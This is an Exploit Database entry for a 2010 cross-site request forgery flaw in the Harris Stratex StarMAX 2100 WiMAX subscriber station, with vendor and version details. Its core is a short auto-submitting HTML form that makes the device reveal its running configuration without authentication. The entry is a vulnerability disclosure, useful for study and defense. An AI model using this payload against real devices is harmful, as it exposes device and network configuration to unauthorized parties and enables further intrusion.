Harris Stratex StarMAX 2100 WIMAX Subscriber Station – Running Configuration Cross-Site Request Forgery

• Exploit Database
• 49 阅读

• 作者： kalyanakumar
  日期： 2010-07-07
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/14264/

• I found CSRF vulnerability in Harris Stratex WIMAX 2100 subscriber
  station.Using this code i am able to view the current configuration of the
  subscriber station without authentication from both LAN & WAN
  
  # Software Link:http://securityvulns.com/Wdocument736.html
  # Version: 3.0.4.1.7.C
  # Tested on: Any os
  # CVE : No
  
  Product :StarMAX 2100 WIMAX subscriber station
  Affected Application Version: 3.0.4.1.7.C
  Vendor submission:07-04-2009
  Vendor Response:No
  Vulnerability:Able to view the running configuration without authentication
  from both LAN & WAN
  
  <html>
  <body>
  <body onload="config.submit();">
  <form name=config method="get" action="http:192.168.1.1/frameCmd6.html">
  <input type=hidden name=showRunConfig value="Current Configuration">
  </form>
  </body>
  </html>
  
  
  Thanks
  Kalyan
  Security researcher